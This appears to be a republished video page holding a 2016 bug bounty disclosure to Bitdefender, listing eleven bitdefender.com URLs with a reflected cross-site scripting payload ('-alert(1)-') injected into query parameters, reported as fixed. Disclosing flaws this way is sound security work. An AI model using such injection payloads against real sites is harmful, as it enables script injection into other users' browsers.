Videos

Published on September 9th, 2016 📆 | 8563 Views ⚑

0

bitdefender.com bug bounty- 250$ (11 XSS Cross-site scripting reflected) fixed

iSpeech


Hi bitdefender secuirty team

------------------------------------------------------------------------
My name is Emad Abou Shanab from Egypt

-------------------------------------------------------------------------
The bug is Cross-site scripting (reflected)

The domain is bitdefender.com = 11 XSS bugs

The payload = '-alert(1)-'
-------------------------------------------------------------------------
the vulnerable urls

1:- http://www.bitdefender.com/?ctrsel=1b3sl5'-alert(1)-'mkpqs
2:- http://www.bitdefender.com/box/?icid=NA_box2016_homepage_bannerzo622'-alert(1)-'ntdzv
3:- http://www.bitdefender.com/business/aws-security.html?icid=business_menubybbh'-alert(1)-'c2plp
4:- http://www.bitdefender.com/business/cloud-security-for-msps.html?icid=business_menumkwf4'-alert(1)-'f0urs
5:- http://www.bitdefender.com/business/renew/?icid=NA_quickrenew2015_homepage_bannerwlic2'-alert(1)-'q0sir
6:- http://www.bitdefender.com/business/security-for-msps-kaseya.html?icid=business_menus0n1e'-alert(1)-'bjk2q
7:- http://www.bitdefender.com/business/service-providers.html?icid=business_menuzjvy2'-alert(1)-'hdjj5
8:- http://www.bitdefender.com/company.html?ajax=hgi57'-alert(1)-'rsk2w
9:- http://www.bitdefender.com/media/html/digitalife2016/?pid=HPB_NA_digitalife2016&icid=NA_back2school2016_homepage_bannerumg0o'-alert(1)-'xpomp
10:-http://www.bitdefender.com/media/html/digitalife2016/?pid=HPB_NA_digitalife2016nlkpx'-alert(1)-'vvrkh&icid=NA_back2school2016_homepage_banner
11:- http://www.bitdefender.com/media/html/enterprise-cybersecurity/?icid=NA_brand_businessbrandawarenessivuka'-alert(1)-'blz7y

-------------------------------------------------------------------------
I hope you fix it ASAP

Thanks for watching

LIVE POC


2016-09-08 23:32:31

source

Tagged with: bitdefender • bounty • cross • fixed • reflected • scripting